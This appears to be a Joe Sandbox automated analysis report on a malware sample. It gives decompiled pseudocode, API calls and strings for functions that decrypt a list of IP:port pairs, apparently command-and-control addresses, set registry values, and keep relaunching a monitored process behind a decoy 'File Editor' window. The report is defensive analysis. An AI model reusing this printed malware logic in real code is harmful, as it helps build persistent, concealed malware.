0x040013f0
0x04001406
0x0400140b
0x04001411
0x04001414
0x0400141b
0x04001425
0x04001437
0x0400143d
0x0400144f
0x04001454
0x04001459
0x00000000
0x00000000
0x04001461
0x04001461
0x0400146e
0x04001478
0x04001434
0x04001434
0x04001485
0x0400148a
0x0400148d
0x04001496
0x040014bc
0x040014c1
0x040014ca
0x040014d3
0x040014dc
0x00000000
0x040014dc
0x00000000
0x040014ab
0x040014f1
0x00000000
0x040014f7
0x00000000
0x040013dc

APIs

GetProcessHeap.KERNEL32(00000008,-00000005), ref: 040013C6
RtlAllocateHeap.NTDLL(00000000), ref: 040013CD
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0400149E
HeapFree.KERNEL32(00000000), ref: 040014A5
GetProcessHeap.KERNEL32(00000000,00000000), ref: 040014EA
HeapFree.KERNEL32(00000000), ref: 040014F1

Strings

====, xrefs: 040013FA

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: Heap$Process$Free$Allocate
String ID: ====
API String ID: 168621272-1026985228
Opcode ID: cc6d638cfefe3820553d32bbcecc0cddb825681ad85667f70979d716b4f01239
Instruction ID: c6e28297ba35799b7f22f7dab3aca0fae7ec72587fc4187f79a8e8c8e7655232
Opcode Fuzzy Hash: cc6d638cfefe3820553d32bbcecc0cddb825681ad85667f70979d716b4f01239
Instruction Fuzzy Hash: F7414CB5D04209EBEB04DFA4C884BEE7BB5FF44309F108619E515BB2D0D735AA45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 04007970 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 115
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E04007970(intOrPtr* _a4) {
				long _v8;
				void* _v12;
				int _v16;
				long _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				void* _v40;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _t50;
				intOrPtr _t52;
				void* _t58;
				intOrPtr _t64;
				intOrPtr _t72;
				intOrPtr _t83;
				void* _t96;
				void* _t97;
				void* _t98;

				_v8 = 0;
				if(_a4 != 0) {
					_v16 = 0x8c;
					_v20 = 0x75bc;
					_t50 = VirtualAlloc(0, 0x75bc, 0x3000, 4); // executed
					_v12 = _t50;
					if(_v12 != 0) {
						_t72 =  *0x400e28c; // 0x4013f88
						_t83 =  *0x40118a0; // 0x4013b88
						_t52 = E0400A400(_t83, _t72, _v12, 0x75bc); // executed
						_t97 = _t96 + 0x10;
						_v24 = _t52;
						if(_v24 >= 0x92) {
							_v28 = _v24 - 0x8c;
							_t58 = E04008A70(_v12 + 0x8c,  &_v28, _v12, 0x8c, 0x40130e8, 0x254);
							_t98 = _t97 + 0x18;
							if(_t58 != 0) {
								_v32 = _v12 + 0x8c;
								_v36 = _v28 / 6;
								_v40 = VirtualAlloc(0, _v36 * 0x28, 0x3000, 4);
								if(_v40 != 0) {
									_v48 = 0;
									while(_v48 < _v36) {
										_t64 = E04007B70( &_v44, _v48 * 6 + _v32, 4);
										_push(_v44);
										L0400B1EC();
										_v52 = _t64;
										wnsprintfA(_v48 * 0x28 + _v40, 0x28, "%s:%u", _v52,  *(_v32 + 4 + _v48 * 6) & 0x0000ffff);
										_t98 = _t98 + 0x20;
										_v8 = _v8 + 1;
										_v48 = _v48 + 1;
									}
									 *_a4 = _v40;
								}
							}
						}
						VirtualFree(_v12, 0, 0x8000); // executed
					}
				}
				return _v8;
			}

0x04007976
0x04007981
0x04007987
0x0400798e
0x040079a3
0x040079a9
0x040079b0
0x040079bf
0x040079c6
0x040079cd
0x040079d2
0x040079d5
0x040079df
0x040079ed
0x04007a10
0x04007a15
0x04007a1a
0x04007a29
0x04007a38
0x04007a51
0x04007a58
0x04007a5a
0x04007a6c
0x04007a84
0x04007a8f
0x04007a90
0x04007a95
0x04007abc
0x04007ac2
0x04007acb
0x04007a69
0x04007a69
0x04007ad6
0x04007ad6
0x04007a58
0x04007a1a
0x04007ae3
0x04007ae3
0x040079b0
0x04007aef

APIs

VirtualAlloc.KERNEL32(00000000,000075BC,00003000,00000004), ref: 040079A3

Part of subcall function 0400A400: RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,000F003F,00000000), ref: 0400A45C
Part of subcall function 0400A400: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0400A480
Part of subcall function 0400A400: RegCloseKey.KERNEL32(00000000), ref: 0400A494

VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04007AE3

Part of subcall function 04008A70: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008AD3
Part of subcall function 04008A70: GetLastError.KERNEL32 ref: 04008ADD
Part of subcall function 04008A70: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008B0C
Part of subcall function 04008A70: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 04008B37
Part of subcall function 04008A70: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 04008B5E
Part of subcall function 04008A70: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 04008B7A
Part of subcall function 04008A70: CryptDestroyKey.ADVAPI32(00000000), ref: 04008B87
Part of subcall function 04008A70: CryptDestroyKey.ADVAPI32(00000000), ref: 04008B91
Part of subcall function 04008A70: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008B9D

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04007A4B
inet_ntoa.WS2_32(?), ref: 04007A90
wnsprintfA.SHLWAPI ref: 04007ABC

Strings

%s:%u, xrefs: 04007AAB
Hogerfazwafx, xrefs: 040079C5

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: Crypt$ContextVirtual$AcquireAllocDestroyImport$CloseDecryptErrorFreeLastOpenQueryReleaseValueinet_ntoawnsprintf
String ID: %s:%u$Hogerfazwafx
API String ID: 1891311255-1052426064
Opcode ID: 79f967d1a52c2aaee155b9d7bfa010675069804c64fe547678c39a65b43ec606
Instruction ID: d327848a4ae889dd371e71d646ee9b038911c4fd72f1be7e57aa30bfb263aa34
Opcode Fuzzy Hash: 79f967d1a52c2aaee155b9d7bfa010675069804c64fe547678c39a65b43ec606
Instruction Fuzzy Hash: 8C410FB5E04208EBFB04DF94C945BEEBBB5EB88705F14C159E6057B2C0D779AA40CB64

Uniqueness

Uniqueness Score: -1.00%

Function 04005E30 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 79
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04005E30(signed char _a4) {
				char* _v8;
				char _v9;
				void* _v16;
				void* _v20;
				char* _v24;
				int _v28;
				signed int _v29;
				int _v36;
				char _v68;
				int _v72;
				char* _t31;
				long _t33;
				long _t37;
				char* _t45;

				_v9 = 0;
				_t31 =  *0x40118a0; // 0x4013b88
				_v8 = _t31;
				_t45 =  *0x4011894; // 0x4013fc4
				_v24 = _t45;
				_v16 = 0x80000001;
				if(( *0x401435a & 0x000000ff) != 0) {
					_v16 = 0x80000002;
				}
				_v20 = 0;
				_t33 = RegOpenKeyExA(_v16, _v8, 0, 0xf003f,  &_v20); // executed
				if(_t33 == 0) {
					_v36 = 0x20;
					_v28 = 0x20;
					_v29 = 0;
					_t37 = RegQueryValueExA(_v20, _v24, 0, 0,  &_v68,  &_v28); // executed
					if(_t37 == 0 && _v28 == 0x10) {
						_v29 = 1;
						if((_a4 & 0x000000ff) != 0) {
							RegDeleteValueA(_v20, _v24);
						}
					}
					_t48 = _v29 & 0x000000ff;
					if((_v29 & 0x000000ff) == 0) {
						_v72 = 0x10;
						E04009BD0(_t48,  &_v68, 0x10);
						RegSetValueExA(_v20, _v24, 0, 3,  &_v68, 0x10); // executed
						_v9 = 1;
					}
					RegCloseKey(_v20); // executed
				}
				return _v9;
			}

0x04005e36
0x04005e3a
0x04005e3f
0x04005e42
0x04005e48
0x04005e4b
0x04005e5b
0x04005e5d
0x04005e5d
0x04005e64
0x04005e7e
0x04005e86
0x04005e8c
0x04005e93
0x04005e9a
0x04005eb2
0x04005eba
0x04005ec2
0x04005ecc
0x04005ed6
0x04005ed6
0x04005ecc
0x04005edc
0x04005ee2
0x04005ee4
0x04005ef1
0x04005f0b
0x04005f11
0x04005f11
0x04005f19
0x04005f19
0x04005f25

APIs

RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,000F003F,00000000), ref: 04005E7E
RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 04005EB2
RegDeleteValueA.ADVAPI32(00000000,?), ref: 04005ED6
RegSetValueExA.KERNEL32(00000000,?,00000000,00000003,?,00000010), ref: 04005F0B
RegCloseKey.KERNEL32(00000000), ref: 04005F19

Strings

, xrefs: 04005E93
, xrefs: 04005E8C

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: Value$CloseDeleteOpenQuery
String ID: $
API String ID: 647993726-227171996
Opcode ID: 42940f5d5e5c91af521085ddcd9b03f77c986a907cdf4f49274909f40d6ddbf2
Instruction ID: 89e6ea7d5f7cd1f3b8914b5f239817843937aaeba4a6099ce7b548add1ef5737
Opcode Fuzzy Hash: 42940f5d5e5c91af521085ddcd9b03f77c986a907cdf4f49274909f40d6ddbf2
Instruction Fuzzy Hash: 3A317370A04249AFEF04CFD4D855BFFBBB9AB44704F14815CEA40B7281D7B96A00CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04004AC0 Relevance: 12.1, APIs: 8, Instructions: 68
sleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E04004AC0(intOrPtr _a4) {
				intOrPtr _v8;
				long _v12;
				intOrPtr _v16;
				void* _v20;
				intOrPtr _t31;
				void* _t50;

				_v8 = _a4;
				if(_v8 != 0) {
					__imp__CoInitialize(0);
					L2:
					while(1) {
						if( *((intOrPtr*)(_v8 + 8)) <= 0 || WaitForSingleObject( *(_v8 + 0x24), 0x64) != 0x102) {
							L6:
							Sleep(0x1388); // executed
							continue;
						}
						EnterCriticalSection(_v8 + 0xc);
						_v20 = 0;
						_v12 = 0;
						_t31 = E04008250( *((intOrPtr*)(_v8 + 4)),  *((intOrPtr*)(_v8 + 8)),  &_v20,  &_v12); // executed
						_t50 = _t50 + 0x10;
						_v16 = _t31;
						LeaveCriticalSection(_v8 + 0xc);
						if(_v16 <= 0) {
							goto L6;
						}
						E040062B0(_v20, _v16); // executed
						VirtualFree(_v20, 0, 0x8000); // executed
						SetEvent( *(_v8 + 0x24));
						__imp__CoUninitialize();
						goto L8;
					}
				}
				L8:
				return 0;
			}

0x04004ac9
0x04004ad0
0x04004ad8
0x00000000
0x04004ade
0x04004ae5
0x04004b80
0x04004b85
0x00000000
0x04004b85
0x04004b08
0x04004b0e
0x04004b15
0x04004b32
0x04004b37
0x04004b3a
0x04004b44
0x04004b4e
0x00000000
0x00000000
0x04004b58
0x04004b6b
0x04004b78
0x04004b90
0x00000000
0x04004b90
0x04004ade
0x04004b96
0x04004b9b

APIs

CoInitialize.OLE32(00000000), ref: 04004AD8
WaitForSingleObject.KERNEL32(?,00000064), ref: 04004AF4
EnterCriticalSection.KERNEL32(-0000000C), ref: 04004B08
LeaveCriticalSection.KERNEL32(-0000000C), ref: 04004B44
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04004B6B
SetEvent.KERNEL32(?), ref: 04004B78
Sleep.KERNEL32(00001388), ref: 04004B85
CoUninitialize.OLE32 ref: 04004B90

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: CriticalSection$EnterEventFreeInitializeLeaveObjectSingleSleepUninitializeVirtualWait
String ID:
API String ID: 3462651527-0
Opcode ID: 34458be81e427262741f71e07dfc47b0f17ea7c68782a946b32513cabd3e92be
Instruction ID: a8de0d0852ad7639ac4a8efdad63c4b5a832734fa442b81c8ae14f5e2abf7ac4
Opcode Fuzzy Hash: 34458be81e427262741f71e07dfc47b0f17ea7c68782a946b32513cabd3e92be
Instruction Fuzzy Hash: 1C213075A00208EFE704EF94D958FAEB7B9EB48305F10C658E605B7281D739EE84CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00401A9C Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 161
windowCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00401A9C(struct HWND__* _a4, int _a8, signed int _a12, signed int _a16) {
				void* _v12;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				int _v60;
				struct HMENU__* _v64;
				int _t52;
				int _t53;
				struct HWND__* _t59;
				signed int _t66;
				signed int _t92;
				void* _t100;

				_t52 = _a8;
				if(_t52 == 5) {
					if(_a12 != 1) {
						_t59 = GetDlgItem(_a4, 0x3e9);
						_v48 = 1;
						_v52 = _a16 >> 0x00000010 & 0x0000ffff;
						_v56 = _a16 & 0x0000ffff;
						_v60 = 0;
						_v64 = 0;
						 *(_t100 - 8) = _t59;
						MoveWindow(??, ??, ??, ??, ??, ??);
					}
					goto L29;
				} else {
					if(_t52 > 5) {
						if(_t52 == 0x10) {
							DestroyWindow(_a4);
							goto L29;
						} else {
							if(_t52 == 0x111) {
								_t66 = _a12 & 0x0000ffff;
								if(_t66 == 0x236e) {
									E00401879(_a4, 0);
									goto L25;
								} else {
									if(_t66 > 0x236e) {
										if(_t66 == 0x236f) {
											PostMessageA(_a4, 0x10, 0, 0);
											goto L25;
										} else {
											if(_t66 == 0x2370) {
												E00401879(_a4, 1);
												goto L25;
											} else {
											}
										}
									} else {
										if(_t66 == 0x236d) {
											MessageBoxA(0, "File Editor for Windows!\nCreated using the Win32 API", "About...", 0);
											L25:
										} else {
										}
									}
								}
								goto L29;
							} else {
								if(_t52 == 7) {
									 *(_t100 - 8) = GetDlgItem(_a4, 0x3e9);
									SetFocus(??);
									goto L29;
								} else {
									goto L28;
								}
							}
						}
					} else {
						if(_t52 == 1) {
							CreateWindowExA(0, "EDIT", 0x41f060, 0x50301004, 0x80000000, 0x80000000, 0x80000000, 0x80000000, _a4, 0x3e9, GetModuleHandleA(0), 0); // executed
							_t92 = GetStockObject(0x11);
							_v52 = 1;
							_v56 = _t92;
							_v60 = 0x30;
							_v64 = 0x3e9;
							 *((intOrPtr*)(_t100 - 0xffffffffffffffd0)) = _a4;
							SendDlgItemMessageA(??, ??, ??, ??, ??); // executed
							goto L29;
						} else {
							if(_t52 == 2) {
								PostQuitMessage(0);
								L29:
								_t53 = 0;
							} else {
								L28:
								_t53 = DefWindowProcA(_a4, _a8, _a12, _a16); // executed
							}
						}
					}
				}
				return _t53;
			}

0x00401aa4
0x00401aaa
0x00401ba5
0x00401bc9
0x00401bce
0x00401bd6
0x00401bda
0x00401bde
0x00401be6
0x00401bee
0x00401bf6
0x00401bf8
0x00000000
0x00401ab0
0x00401ab3
0x00401acb
0x00401ce8
0x00000000
0x00401ad1
0x00401ad6
0x00401c2d
0x00401c35
0x00401c6b
0x00000000
0x00401c37
0x00401c3c
0x00401c4f
0x00401caa
0x00000000
0x00401c51
0x00401c56
0x00401c80
0x00000000
0x00000000
0x00401c58
0x00401c56
0x00401c3e
0x00401c43
0x00401cd5
0x00401cdb
0x00000000
0x00401c45
0x00401c43
0x00401c3c
0x00000000
0x00401adc
0x00401adf
0x00401c18
0x00401c20
0x00000000
0x00401ae5
0x00000000
0x00401ae5
0x00401adf
0x00401ad6
0x00401ab5
0x00401ab8
0x00401b5a
0x00401b6b
0x00401b70
0x00401b78
0x00401b7c
0x00401b84
0x00401b8f
0x00401b97
0x00000000
0x00401aba
0x00401abd
0x00401cfb
0x00401d29
0x00401d29
0x00401ac3
0x00401d02
0x00401d22
0x00401d24
0x00401abd
0x00401ab8
0x00401ab3
0x00401d34

APIs

CreateWindowExA.USER32 ref: 00401B5A
SendDlgItemMessageA.USER32 ref: 00401B97

Strings

0, xrefs: 00401B7C
EDIT, xrefs: 00401B46
File Editor for Windows!Created using the Win32 API, xrefs: 00401CC1
About..., xrefs: 00401CB9

Memory Dump Source

Source File: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: CreateItemMessageSendWindow
String ID: 0$About...$EDIT$File Editor for Windows!Created using the Win32 API
API String ID: 2461998243-509482549
Opcode ID: 8ec94040c610515bec2416d0adaa2c3baf4629c9f06ab549dac859a33765003e
Instruction ID: e85ddbd10a1709dc64db389d43dfdca03f0125780d47bd1fb79a5389fcfd3c42
Opcode Fuzzy Hash: 8ec94040c610515bec2416d0adaa2c3baf4629c9f06ab549dac859a33765003e
Instruction Fuzzy Hash: 4A6118B0508304DFE710EF28D99875E7BE4EB44304F50892EE899DB3A1D379D9859B8B

Uniqueness

Uniqueness Score: -1.00%

Function 040077B0 Relevance: 10.6, APIs: 7, Instructions: 80
sleepCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E040077B0(void** _a4) {
				void** _v8;
				intOrPtr _v12;
				long _v16;
				long _v20;
				long _v24;
				void** _v28;
				int _t37;
				void* _t40;
				void* _t60;

				if(_a4 != 0) {
					__imp__CoInitialize(0);
					_v12 = 0x96;
					_v16 = 0x1388;
					_v8 = _a4;
					if( *_v8 != 0) {
						_v20 = 0;
						while(_v20 < 0x96) {
							_v24 = 0;
							_t37 = GetExitCodeProcess(_v8[3],  &_v24); // executed
							if(_t37 == 0) {
							} else {
								if(_v24 != 0x103) {
									CloseHandle(_v8[3]);
									Sleep(0x7530);
									_t40 = E04002070( *_v8);
									_t60 = _t60 + 4;
									_v8[3] = _t40;
									if(_v8[3] != 0) {
										_v20 = _v20 + 1;
										if((_v8[2] & 0x00000004) != 0) {
											E04002510(_v8[3], 0x400e290);
											_t60 = _t60 + 8;
										}
										goto L11;
									} else {
									}
								} else {
									Sleep(0x1388); // executed
									L11:
									continue;
								}
							}
							break;
						}
						VirtualFree( *_v8, 0, 0x8000);
						_v28 = _v8;
						E040097C0(_v28);
					}
					__imp__CoUninitialize();
				}
				return 0;
			}

0x040077ba
0x040077c2
0x040077c8
0x040077cf
0x040077d9
0x040077e2
0x040077e8
0x040077ef
0x040077fc
0x0400780e
0x04007816
0x04007818
0x0400781f
0x04007835
0x04007840
0x0400784c
0x04007851
0x04007857
0x04007861
0x0400786d
0x04007879
0x04007887
0x0400788c
0x0400788c
0x00000000
0x00000000
0x04007863
0x04007821
0x04007826
0x0400788f
0x00000000
0x04007893
0x0400781f
0x00000000
0x04007816
0x040078a5
0x040078ae
0x040078b5
0x040078ba
0x040078bd
0x040078bd
0x040078c8

APIs

CoInitialize.OLE32(00000000), ref: 040077C2
GetExitCodeProcess.KERNEL32 ref: 0400780E
Sleep.KERNEL32(00001388), ref: 04007826
CloseHandle.KERNEL32(00001388), ref: 04007835
Sleep.KERNEL32(00007530), ref: 04007840
VirtualFree.KERNEL32(00000096,00000000,00008000), ref: 040078A5
CoUninitialize.OLE32 ref: 040078BD

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: Sleep$CloseCodeExitFreeHandleInitializeProcessUninitializeVirtual
String ID:
API String ID: 2326833528-0
Opcode ID: 40971a79621a4715f304bef9d1a112be756b69aca4ab6b623c127bbca2746a66
Instruction ID: 786529089a386be0191f5a1a0158813805cafbe076d78358bbe760b2cac44d20
Opcode Fuzzy Hash: 40971a79621a4715f304bef9d1a112be756b69aca4ab6b623c127bbca2746a66
Instruction Fuzzy Hash: 62318E74A00209EBFB54CF90C848BAEB7B1FB44305F14C668E905B7280D779BE40CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04005CD0 Relevance: 10.6, APIs: 7, Instructions: 72
filememorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04005CD0(CHAR* _a4) {
				long _v8;
				void* _v12;
				long _v16;
				void* _v20;
				long _v24;
				void* _t29;
				void* _t34;

				_v8 = 0;
				if(_a4 != 0 && lstrlenA(_a4) >= 4) {
					_t29 = CreateFileA(_a4, 0x80000000, 7, 0, 3, 0x80, 0); // executed
					_v12 = _t29;
					if(_v12 != 0xffffffff) {
						_v16 = GetFileSize(_v12, 0);
						if(_v16 > 0) {
							_t34 = VirtualAlloc(0, _v16, 0x3000, 4); // executed
							_v20 = _t34;
							if(_v20 != 0) {
								_v24 = 0;
								ReadFile(_v12, _v20, _v16,  &_v24, 0); // executed
								if(_v24 == _v16) {
									_v8 = E040016F0(_v20, _v16);
								}
								VirtualFree(_v20, 0, 0x8000); // executed
							}
						}
						FindCloseChangeNotification(_v12); // executed
					}
				}
				return _v8;
			}

0x04005cd6
0x04005ce1
0x04005d10
0x04005d16
0x04005d1d
0x04005d2f
0x04005d36
0x04005d45
0x04005d4b
0x04005d52
0x04005d54
0x04005d6d
0x04005d79
0x04005d8b
0x04005d8b
0x04005d99
0x04005d99
0x04005d52
0x04005da3
0x04005da3
0x04005d1d
0x04005daf

APIs

lstrlenA.KERNEL32(00000000), ref: 04005CEB
CreateFileA.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04005D10
GetFileSize.KERNEL32(000000FF,00000000), ref: 04005D29
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04005D45
ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 04005D6D
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04005D99
FindCloseChangeNotification.KERNEL32(000000FF), ref: 04005DA3

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: File$Virtual$AllocChangeCloseCreateFindFreeNotificationReadSizelstrlen
String ID:
API String ID: 443218420-0
Opcode ID: 071662be6b1e22e21ec0747122ec9fe5ab089f82a602849f769d97fd77600298
Instruction ID: 1c3b7df952a912c4f86c12ad70d9a091debb45511137cc5b62942badbf1a5776
Opcode Fuzzy Hash: 071662be6b1e22e21ec0747122ec9fe5ab089f82a602849f769d97fd77600298
Instruction Fuzzy Hash: 7021EC75A00208FBEB64DFA4DC49BAE77B5EB48705F108659F615BB2C0C778AA80CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0040F4D0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 336COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 0040F544
memmove.MSVCRT ref: 0040F74A
malloc.MSVCRT ref: 0040F82B

Strings

`', xrefs: 0040F52E, 0040F561, 0040F5FF, 0040F624, 0040F71F, 0040F74F, 0040F772, 0040F84A, 0040F8C7, 0040F939, 0040F985, 0040F9AF, 0040FA23, 0040FAC2
p', xrefs: 0040F573, 0040F5E6, 0040F62F, 0040F656, 0040F68C, 0040F6BE, 0040F6EB, 0040F75E, 0040F794, 0040F7C3, 0040F7EB, 0040F813, 0040F95F

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: mallocmemmoverealloc
String ID: `'$p'
API String ID: 1823370115-286278047
Opcode ID: 7709683076d90ca535b78cad08b96f01a0e0988889cd0d9cf5be07c8e64d2818
Instruction ID: e81dcd2bf55d7575d62e3bdedaa82d3939f2d228369639f389b0d43c20e4441b
Opcode Fuzzy Hash: 7709683076d90ca535b78cad08b96f01a0e0988889cd0d9cf5be07c8e64d2818
Instruction Fuzzy Hash: 82E11CF0704301EFD724AF15D64071ABBE0AB84744F90C83ED8859B792D7B9988ADB5A

Uniqueness

Uniqueness Score: -1.00%

Function 04005B50 Relevance: 8.9, APIs: 7, Instructions: 124
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04005B50(CHAR* _a4, char* _a8, intOrPtr* _a12, intOrPtr* _a16) {
				void* _v8;
				void* _v12;
				signed int _v16;
				long _v20;
				void* _v24;
				int _v28;
				int _v32;
				char* _v36;
				char* _v40;
				void* _v44;
				void* _t69;

				_v8 = 0;
				if(_a4 != 0 && _a8 != 0 && _a12 != 0) {
					_v32 = lstrlenA(_a8);
					_v28 = lstrlenA(_a4);
					_v24 = 0;
					_v16 = 0;
					while(_v24 < _v28) {
						_v36 = StrStrIA( &(_a4[_v24]), _a8);
						if(_v36 != 0) {
							_v16 = _v16 + 1;
							_v24 = _v36 - _a4 + _v32;
							continue;
						}
						break;
					}
					_v20 = _v16 * 0x28;
					_t69 = VirtualAlloc(0, _v20, 0x3000, 4); // executed
					_v12 = _t69;
					if(_v12 != 0) {
						_v24 = 0;
						_v16 = 0;
						while(_v24 < _v28) {
							_v40 = StrStrIA( &(_a4[_v24]), _a8);
							if(_v40 != 0) {
								lstrcpynA(_v12 + _v16 * 0x28,  &(_a4[_v24]), _v40 -  &(_a4[_v24]) + 1);
								_v24 = _v40 - _a4 + _v32;
								_v16 = _v16 + 1;
								_v8 = _v8 + 1;
								 *_a12 = _v12;
								continue;
							}
							break;
						}
						if(_a16 != 0) {
							_v44 = VirtualAlloc(0, _v20, 0x3000, 4);
							if(_v44 != 0) {
